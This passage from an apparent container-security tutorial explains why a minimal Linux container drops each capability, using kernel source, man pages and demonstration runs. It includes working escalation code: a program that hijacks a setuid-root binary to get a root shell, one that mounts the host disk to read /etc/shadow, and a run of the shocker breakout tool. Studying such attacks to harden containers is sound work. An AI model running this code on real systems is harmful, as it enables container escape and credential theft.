 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */
struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};

For example, in `test_perm`, in the `/proc/sys`-handling code:

fs/proc/proc_sysctl.c:406@c8d2bc

static int test_perm(int mode, int op)
{
	if (uid_eq(current_euid(), GLOBAL_ROOT_UID))
		mode >>= 6;
	else if (in_egroup_p(GLOBAL_ROOT_GID))
		mode >>= 3;
	if ((op & ~mode & (MAY_READ|MAY_WRITE|MAY_EXEC)) == 0)
		return 0;
	return -EACCES;
}
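
A userspace model of that function shows why the supplementary groups matter. This is a sketch and not kernel code: `test_perm_model` and its two boolean parameters are made up, standing in for `uid_eq(current_euid(), GLOBAL_ROOT_UID)` and `in_egroup_p(GLOBAL_ROOT_GID)`. As far as I know `in_egroup_p` also consults `group_info`, so a process that changed its gids but kept group 0 as a supplementary group would still take the group branch.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Same bit values as the kernel's MAY_* flags. */
#define MAY_EXEC  1
#define MAY_WRITE 2
#define MAY_READ  4

/* Userspace model of test_perm(); mode is a plain permission triple such
 * as 0664. Returns 0 if op is allowed and -EACCES otherwise. */
int test_perm_model(int mode, int op, bool euid_is_root, bool in_root_group)
{
	assert(mode >= 0 && mode <= 0777);
	if (euid_is_root)
		mode >>= 6;	/* use the owner bits */
	else if (in_root_group)
		mode >>= 3;	/* use the group bits */
	/* otherwise the "other" bits are already in the low three bits */
	if ((op & ~mode & (MAY_READ | MAY_WRITE | MAY_EXEC)) == 0)
		return 0;
	return -EACCES;
}
```

With a mode of 0664, a write is allowed for euid 0 and for a non-root process that is still in group 0, and refused for everyone else.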

try_regain_cap.c
/* -*- compile-command: "gcc -Wall -Werror -static try_regain_cap.c -o try_regain_cap" -*- */
#include <linux/capability.h>
#include <sys/prctl.h>
#include <stdio.h>

int main (int argc, char  **argv)
{
	if (prctl(PR_CAPBSET_READ, CAP_MKNOD, 0, 0, 0)) {
 		fprintf(stderr, "++ have CAP_MKNOD\n");
	} else {
		fprintf(stderr, "++ don't have CAP_MKNOD\n");
	}
	return 0;
}

If we drop the bounding set, files with extra capabilities don’t get those capabilities:

[lizzie@empress l-c-i-500-l]$ sudo setcap "cap_mknod+p" try_regain_cap
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.lVLNB1...done.
=> trying a user namespace...writing /proc/852/uid_map...writing /proc/852/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ don't have CAP_MKNOD
=> cleaning cgroups...done.

but if we don’t, they work:

allow_all_caps.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..6ab1719 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -53,10 +53,7 @@ int capabilities()
 	size_t num_caps = sizeof(drop_caps) / sizeof(*drop_caps);
 	fprintf(stderr, "bounding...");
 	for (size_t i = 0; i < num_caps; i++) {
-		if (prctl(PR_CAPBSET_DROP, drop_caps[i], 0, 0, 0)) {
-			fprintf(stderr, "prctl failed: %m\n");
-			return 1;
-		}
+		continue;
 	}
 	fprintf(stderr, "inheritable...");
 	cap_t caps = NULL;
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_all_caps -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Qnzw2A...done.
=> trying a user namespace...writing /proc/940/uid_map...writing /proc/940/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ have CAP_MKNOD
=> cleaning cgroups...done.

(and if we set `+ep`, execve fails because it’s considered a “capability-dumb binary”)

[lizzie@empress l-c-i-500-l]$ sudo setcap "cap_mknod+ep" try_regain_cap
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Esog3p...done.
=> trying a user namespace...writing /proc/994/uid_map...writing /proc/994/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
execve failed! Operation not permitted.
=> cleaning cgroups...done.

man 7 capabilities

   Safety checking for capability-dumb binaries
	A  capability-dumb binary  is an  application that  has been
	marked to have file capabilities, but has not been converted
	to  use the  libcap(3) API  to manipulate  its capabilities.
	(In  other words,  this  is  a traditional  set-user-ID-root
	program that has been switched to use file capabilities, but
	whose   code   has   not   been   modified   to   understand
	capabilities.)    For  such   applications,  the   effective
	capability  bit  is  set  on  the file,  so  that  the  file
	permitted  capabilities  are  automatically enabled  in  the
	process effective  set when executing the  file.  The kernel
	recognizes a file which has the effective capability bit set
	as capability-dumb  for the  purpose of the  check described
	here.

	When executing  a capability-dumb binary, the  kernel checks
	if the process obtained all permitted capabilities that were
	specified in  the file  permitted set, after  the capability
	transformations described  above have been  performed.  (The
	typical  reason  why  this  might  not  occur  is  that  the
	capability bounding set masked  out some of the capabilities
	in the file  permitted set.)  If the process  did not obtain
	the full set of  file permitted capabilities, then execve(2)
	fails with the error EPERM.  This prevents possible security
	risks that could arise when a capability-dumb application is
	executed with less  privilege that it needs.   Note that, by
	definition, the application could  not itself recognize this
	problem, since it does not employ the libcap(3) API.
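
The check described there can be modelled in a few lines. This is a simplified sketch of the rule as capabilities(7) states it, not the kernel's code: the struct and function names are made up, and ambient capabilities and the special cases for uid 0 are deliberately left out.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>

#define CAP_BIT(cap) (UINT64_C(1) << (cap))
#define CAP_MKNOD_NR 27	/* value of CAP_MKNOD in <linux/capability.h> */

struct exec_caps {		/* the process before execve */
	uint64_t inheritable;	/* P(inheritable) */
	uint64_t bounding;	/* P(bounding) */
};

struct file_caps {		/* capabilities attached to the file */
	uint64_t permitted;	/* F(permitted) */
	uint64_t inheritable;	/* F(inheritable) */
	bool effective;		/* the file's effective bit */
};

/* Hypothetical model: computes P'(permitted) and stores it on success.
 * Returns -EPERM for a capability-dumb binary (effective bit set) that
 * would not receive its whole file permitted set. */
int exec_permitted(const struct exec_caps *p, const struct file_caps *f,
		   uint64_t *new_permitted)
{
	assert(p && f && new_permitted);
	uint64_t permitted = (p->inheritable & f->inheritable)
		| (f->permitted & p->bounding);
	if (f->effective && (f->permitted & ~permitted))
		return -EPERM;
	*new_permitted = permitted;
	return 0;
}
```

In this model, a file with only the permitted bit set quietly loses a capability that the bounding set masks out, while the same file with the effective bit set makes the exec fail with EPERM.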

kernel/audit.c:663@c8d2bc

switch (msg_type) {
case AUDIT_LIST:
case AUDIT_ADD:
case AUDIT_DEL:
	return -EOPNOTSUPP;
case AUDIT_GET:
case AUDIT_SET:
case AUDIT_GET_FEATURE:
case AUDIT_SET_FEATURE:
case AUDIT_LIST_RULES:
case AUDIT_ADD_RULE:
case AUDIT_DEL_RULE:
case AUDIT_SIGNAL_INFO:
case AUDIT_TTY_GET:
case AUDIT_TTY_SET:
case AUDIT_TRIM:
case AUDIT_MAKE_EQUIV:
	/* Only support auditd and auditctl in initial pid namespace
	 * for now. */
	if (task_active_pid_ns(current) != &init_pid_ns)
		return -EPERM;

	if (!netlink_capable(skb, CAP_AUDIT_CONTROL))
		err = -EPERM;
	break;
case AUDIT_USER:
case AUDIT_FIRST_USER_MSG ... AUDIT_LAST_USER_MSG:
case AUDIT_FIRST_USER_MSG2 ... AUDIT_LAST_USER_MSG2:
	if (!netlink_capable(skb, CAP_AUDIT_WRITE))
		err = -EPERM;
	break;
default:  /* bad msg */
	err = -EINVAL;
}

You can reach this code by calling

socket(AF_NETLINK, SOCK_DGRAM, NETLINK_AUDIT)

man 7 netlink

NETLINK(7) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

NAME
	netlink  -  communication  between  kernel  and  user  space
	(AF_NETLINK)
SYNOPSIS
	[...]
	netlink_socket = socket(AF_NETLINK, socket_type, netlink_family);
	[...]
DESCRIPTION
	Netlink is  used to transfer information  between the kernel
	and  user-space  processes.   It   consists  of  a  standard
	sockets-based  interface for  user  space  processes and  an
	internal kernel API for kernel modules.
	[...]
	netlink_family selects the kernel module or netlink group to
	communicate with.   The currently assigned  netlink families
	are:
	[...]
	NETLINK_AUDIT (since Linux 2.6.6)
		Auditing.

man 7 capabilities

	CAP_BLOCK_SUSPEND (since Linux 3.5)
		Employ features that can block system suspend (epoll(7)
		EPOLLWAKEUP, /proc/sys/wake_lock).

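The email from Sebastian Krahmer describes it:

In 0.11 the problem is that the apps that run in the container have CAP_DAC_READ_SEARCH and CAP_DAC_OVERRIDE, which allows the containered app to access files not just by pathname (which would be impossible due to the bind mount of the rootfs) but also by handles via open_by_handle_at(). Handles are mostly 64-bit values that are kind of pre-computable, as they are inode-based and the inode of / is 2. So you can go ahead and walk / by passing a handle of 2 and search the FS until you find the inode# of the file you want to access. Even though you are containered somewhere in /var/lib.

and links to the code, shocker.c.

Note that we’re not vulnerable if user namespaces are on, since `open_by_handle_at` checks for `CAP_DAC_READ_SEARCH` in the root namespace: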

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.GSmTxw...done.
=> trying a user namespace...writing /proc/1538/uid_map...writing /proc/1538/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
=> cleaning cgroups...done.
fs/fhandle.c:166
static int handle_to_path(int mountdirfd, struct file_handle __user *ufh,
		   struct path *path)
{
	int retval = 0;
	struct file_handle f_handle;
	struct file_handle *handle = NULL;

	/*
	 * With handle we don't look at the execute bit on the
	 * the directory. Ideally we would like CAP_DAC_SEARCH.
	 * But we don't have that
	 */
	if (!capable(CAP_DAC_READ_SEARCH)) {
		retval = -EPERM;
		goto out_err;
	}
	/* ... */
}

The setuid executable we’ll subvert:

harmless_setuid.c
/* -*- compile-command: "gcc -Wall -Werror harmless_setuid.c -o harmless_setuid" -*- */
#define _GNU_SOURCE
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	uid_t a, b, c = 0;
	getresuid(&a, &b, &c);
	printf("I'm #%d/%d/%d\n", a, b, c);
	return 0;
}

This program will write itself to the executable at `argv[1]`. If it’s a setuid root executable, there’s no user namespace, and `CAP_FSETID` isn’t dropped, it’ll retain setuid root.

cap_fsetid.c
/* -*- compile-command: "gcc -Wall -Werror -static cap_fsetid.c -o cap_fsetid" -*- */
#define _GNU_SOURCE
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	if (argc == 2) {
		/* write our contents to the setuid file. */
		int setuid_file = 0;
		int own_file = 0;
		if ((setuid_file = open(argv[1], O_WRONLY | O_TRUNC)) == -1
		    || (own_file = open(argv[0], O_RDONLY)) == -1) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		errno = 0;
		char here = 0;
		while (read(own_file, &here, 1) > 0
		       && write(setuid_file, &here, 1) > 0);;
		if (errno) {
			fprintf(stderr, "++ reading/writing: %m\n");
			close(setuid_file);
			close(own_file);
			return 1;
		}
		close(own_file);
		close(setuid_file);
	} else {
		if (setresuid(0, 0, 0)) {
			fprintf(stderr, "++ failed switching uids to root: %m\n");
			return 1;
		}
		execve("/bin/sh", (char *[]) { "sh", 0 }, NULL);
	}
	return 0;
}
allow_capfsetid.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..17e7373 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -34,7 +34,6 @@ int capabilities()
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
 		CAP_DAC_READ_SEARCH,
-		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
[lizzie@empress l-c-i-500-l]$ make -B harmless_setuid
cc -Wall -Werror -static harmless_setuid.c -o harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chown root harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chmod 4755 harmless_setuid
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid
I'm #1000/0/0
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./cap_fsetid harmless_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.qapCVs...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid 
++ failed switching uids to root: Operation not permitted
[lizzie@empress l-c-i-500-l]$ make -B harmless_setuid
cc -Wall -Werror -static harmless_setuid.c -o harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chown root harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chmod 4755 harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capfsetid -m . -u 0 -c ./cap_fsetid harmless_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.4u1dNe...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ls -lh ./harmless_setuid
-rwsr-xr-x 1 root lizzie 788K Oct 25 05:22 ./harmless_setuid
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid
sh-4.3# whoami
root
sh-4.3# id
uid=0(root) gid=1000(lizzie) groups=1000(lizzie)
sh-4.3# exit
[lizzie@empress l-c-i-500-l]$ rm harmless_setuid

man 2 mlock

DESCRIPTION
	mlock(), mlock2(),  and mlockall() lock  part or all  of the
	calling process's virtual address space into RAM, preventing
	that memory from being paged to the swap area.

	munlock() and  munlockall() perform the  converse operation,
	unlocking  part  or all  of  the  calling process's  virtual
	address  space,  so  that  pages in  the  specified  virtual
	address range may once more to be swapped out if required by
	the kernel memory manager.

	Memory locking and unlocking are performed in units of whole
	pages.

ERRORS

	ENOMEM
		(Linux  2.6.9  and  later)  the caller  had  a  nonzero
		RLIMIT_MEMLOCK soft  resource limit, but tried  to lock
		more memory  than the  limit permitted.  This  limit is
		not   enforced    if   the   process    is   privileged
		(CAP_IPC_LOCK).

These functions are the only use of `CAP_IPC_LOCK`; the only mention in the source is

mm/mlock.c:27@c8d2bc

bool can_do_mlock(void)
{
	if (rlimit(RLIMIT_MEMLOCK) != 0)
		return true;
	if (capable(CAP_IPC_LOCK))
		return true;
	return false;
}

cap_mknod.c
/* -*- compile-command: "gcc -Wall -Werror -static cap_mknod.c -o cap_mknod" -*- */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
#define DEV "/disk"
#define MNT "/mnt"

int main (int argc, char **argv)
{
	if (argc != 4) return 1;
	int return_code = 0;
	int etc_shadow = 0;
	
	dev_t dev = makedev(atoi(argv[1]), atoi(argv[2]));
	if (mknod(DEV, S_IFBLK | S_IRUSR, dev)) {
		fprintf(stderr, "++ mknod failed: %m\n");
		return 1;
	}
	if (mkdir(MNT, S_IRUSR)
	    && (errno != EEXIST)) {
		fprintf(stderr, "++ mkdir failed: %m\n");
		goto cleanup_error;
	}
	if (mount(DEV, MNT, argv[3], 0, NULL)) {
		fprintf(stderr, "++ mount failed: %m\n");
		goto cleanup_error;
	}
	if ((etc_shadow = open(MNT "/etc/shadow", O_RDONLY)) == -1) {
		fprintf(stderr, "++ opening /etc/shadow failed: %m\n");
		goto cleanup_error;
	}
	fprintf(stderr, "++ reading /etc/shadow:\n");
	char here = 0;
	errno = 0;
	while (read(etc_shadow, &here, 1) > 0)
		write(STDOUT_FILENO, &here, 1);
	if (errno) {
		fprintf(stderr, "read loop failed! %m\n");
		goto cleanup_error;
	}
	goto cleanup;
cleanup_error:
	return_code = 1;
cleanup:
	if (etc_shadow) close(etc_shadow);
	umount(MNT);
	unlink(DEV);
	rmdir(MNT);
	return return_code;
}
allow_capmknod.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..985930e 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -38,10 +38,8 @@ int capabilities()
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
-		CAP_MKNOD,
 		CAP_SETFCAP,
 		CAP_SYSLOG,
-		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
 		CAP_SYS_MODULE,
 		CAP_SYS_NICE,

Note that `CAP_SYS_ADMIN` doesn’t need to be allowed for this to work, it’s just that `mount` is more convenient than reading the block device in userspace.

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c cap_mknod 8 1 vfat
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.VTnW1G...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ mknod failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ make contained.allow_capmknod
patch contained.c -i allow_capmknod.diff -o contained.allow_capmknod.c
patching file contained.allow_capmknod.c (read from contained.c)
Hunk #1 succeeded at 46 (offset 8 lines).
cc -Wall -Werror -lseccomp -lcap contained.allow_capmknod.c -o contained.allow_capmknod
rm contained.allow_capmknod.c
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capmknod -m . -u 0 -c cap_mknod 8 1 vfat
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.fdbi8q...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ reading /etc/shadow:
[redacted]
=> cleaning cgroups...done.
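
The `8 1` arguments in the runs above are the major and minor numbers of the block device (major 8 is the SCSI/SATA disk driver, and minor 1 is the first partition of the first disk). As a small sketch of what `makedev` does with them, here are two helpers; `pack_device_number` and `device_number_matches` are names I made up for illustration and are not part of `cap_mknod.c`:

```c
#include <sys/sysmacros.h>
#include <sys/types.h>

/* Hypothetical helper (not in cap_mknod.c): pack a major/minor pair the
   same way cap_mknod.c does before it calls mknod(2). */
dev_t pack_device_number(unsigned int maj, unsigned int min)
{
	return makedev(maj, min);
}

/* Returns 1 if dev unpacks to exactly the given major/minor pair. */
int device_number_matches(dev_t dev, unsigned int maj, unsigned int min)
{
	return major(dev) == maj && minor(dev) == min;
}
```

Anything that can call `mknod` with a number like this can name any block device on the host, which is why dropping `CAP_MKNOD` matters.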

setfcap_and_exec.c
/* -*- compile-command: "gcc -Wall -Werror setfcap_and_exec.c -o setfcap_and_exec  -static -lcap" -*- */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <linux/capability.h>
#include <sys/capability.h>
#include <sys/prctl.h>
#include <sys/types.h>

int main (int argc, char  **argv)
{
	if (argc == 2 && !strcmp(argv[1], "inner")) {
		cap_t self_caps = {0};
		if (!(self_caps = cap_get_proc())) {
			fprintf(stderr, "++ cap_get_proc failed: %m\n");
			return 1;
		}

		cap_flag_value_t cap_mknod_status = CAP_CLEAR;
		if (cap_get_flag(self_caps, CAP_MKNOD, CAP_PERMITTED, &cap_mknod_status)) {
			fprintf(stderr, "++ cap_get_flag failed: %m\n");
			cap_free(self_caps);
			return 1;
		}
		if (cap_mknod_status == CAP_CLEAR)
			fprintf(stderr, "!! don't have cap_mknod+p?\n");

		if (cap_set_flag(self_caps, CAP_EFFECTIVE, 1,
				 & (cap_value_t) { CAP_MKNOD }, CAP_SET)) {
			fprintf(stderr, "++ can't cap_set_flag: %m\n");
			cap_free(self_caps);
			return 1;
		}
		if (cap_set_proc(self_caps)) {
			fprintf(stderr, "++ can't cap_set_proc: %m\n");
			cap_free(self_caps);
			return 1;
		}
		cap_free(self_caps);
		fprintf(stderr, "++ have CAP_MKNOD!\n");
	} else {
		cap_t file_caps = {0};
		if (!(file_caps = cap_from_text("cap_mknod+p"))) {
			fprintf(stderr, "++ cap_from_text failed: %m\n");
			return 1;
		}
		if (cap_set_file(argv[0], file_caps)) {
			fprintf(stderr, "++ cap_set_file failed: %m\n");
			cap_free(file_caps);
			return 1;
		}
		cap_free(file_caps);

		if (execve(argv[0], (char  *[]){ argv[0], "inner", 0 }, NULL)) {
			fprintf(stderr, "++ execve failed: %m\n");
			return 1;
		}
	}
	return 0;
}
allow_capsetfcap.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..0f3a4e2 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -39,7 +39,6 @@ int capabilities()
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
 		CAP_MKNOD,
-		CAP_SETFCAP,
 		CAP_SYSLOG,
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capsetfcap -m . -u 0 -c setfcap_and_exec
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.GCu2Ry...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
!! don't have cap_mknod+p?
++ can't cap_set_proc: Operation not permitted
=> cleaning cgroups...done.

It does work if we don’t restrict `CAP_MKNOD`, so it does seem like processes aren’t allowed to set capabilities on files that they don’t have themselves:

allow_capmknod_capsetfcap.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..b458201 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -38,8 +38,6 @@ int capabilities()
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
-		CAP_MKNOD,
-		CAP_SETFCAP,
 		CAP_SYSLOG,
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capmknod_capsetfcap -m . -u 0 -c setfcap_and_exec
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.IZ1gDw...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ have CAP_MKNOD!
=> cleaning cgroups...done.

This disagrees with Brad Spengler’s note in “False Boundaries and Arbitrary Code Execution”:

CAP_SETFCAP: generic: can set full capabilities on a file, granting full capabilities upon exec

but that’s 5 years old, so it may have changed.

man 7 capabilities

	CAP_SYSLOG (since Linux 2.6.37)
		*  Perform   privileged   syslog(2)  operations.    See
		   syslog(2)  for   information  on   which  operations
		   require privilege.
		*  View kernel  addresses exposed  via /proc  and other
		   interfaces  when /proc/sys/kernel/kptr_restrict  has
		   the   value  1.    (See   the   discussion  of   the
		   kptr_restrict in proc(5).)

man 2 syslog

	SYSLOG_ACTION_READ (2)
		[...] Bytes read from the log disappear from the log
		buffer [...]

	SYSLOG_ACTION_READ_ALL (3)
		[...] The call reads the   last    len   bytes    from
		the    log   buffer (nondestructively) [...]

	SYSLOG_ACTION_READ_CLEAR (4) [...]

	SYSLOG_ACTION_CLEAR (5) [...]

	SYSLOG_ACTION_CONSOLE_OFF (6) [...]

	SYSLOG_ACTION_CONSOLE_ON (7) [...]

	SYSLOG_ACTION_CONSOLE_LEVEL (8) [...]

	SYSLOG_ACTION_SIZE_UNREAD (9) [...]

	SYSLOG_ACTION_SIZE_BUFFER (10) [...]

	All commands  except 3 and  10 require privilege.
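
To make the last line of that excerpt concrete, here is a minimal sketch. The `KLOG_*` names and both function names are my own (glibc doesn’t export the `SYSLOG_ACTION_*` constants), and it assumes the default `dmesg_restrict` setting; a hardened host may require privilege for every action.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/klog.h>

/* Action numbers copied from the syslog(2) excerpt above; the names are
   local to this sketch. */
enum {
	KLOG_READ_ALL = 3,
	KLOG_SIZE_BUFFER = 10,
};

/* Per the man page: every action except 3 and 10 requires privilege.
   Assumes dmesg_restrict is not enabled. */
int syslog_action_needs_privilege(int action)
{
	return action != KLOG_READ_ALL && action != KLOG_SIZE_BUFFER;
}

/* Ask the kernel for the log buffer size.  Returns the size in bytes,
   or a negative errno value (for example -EPERM) on failure. */
int kernel_log_buffer_size(void)
{
	int size = klogctl(KLOG_SIZE_BUFFER, NULL, 0);
	return size < 0 ? -errno : size;
}
```

Calling `kernel_log_buffer_size()` from inside and outside the container is a quick way to see whether the syslog interface is reachable at all.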

All of the uses of `CAP_SYS_BOOT`:

kernel/reboot.c:280@c8d2bc:

SYSCALL_DEFINE4(reboot, int, magic1, int, magic2, unsigned int, cmd,
		void __user *, arg)
{
	struct pid_namespace *pid_ns = task_active_pid_ns(current);
	char buffer[256];
	int ret = 0;

	/* We only trust the superuser with rebooting the system. */
	if (!ns_capable(pid_ns->user_ns, CAP_SYS_BOOT))
		return -EPERM;

	[...]
}

kernel/kexec.c:187@c8d2bc:

SYSCALL_DEFINE4(kexec_load, unsigned long, entry, unsigned long, nr_segments,
		struct kexec_segment __user *, segments, unsigned long, flags)
{
	int result;

	/* We only trust the superuser with rebooting the system. */
	if (!capable(CAP_SYS_BOOT) || kexec_load_disabled)
		return -EPERM;

	[...]
}

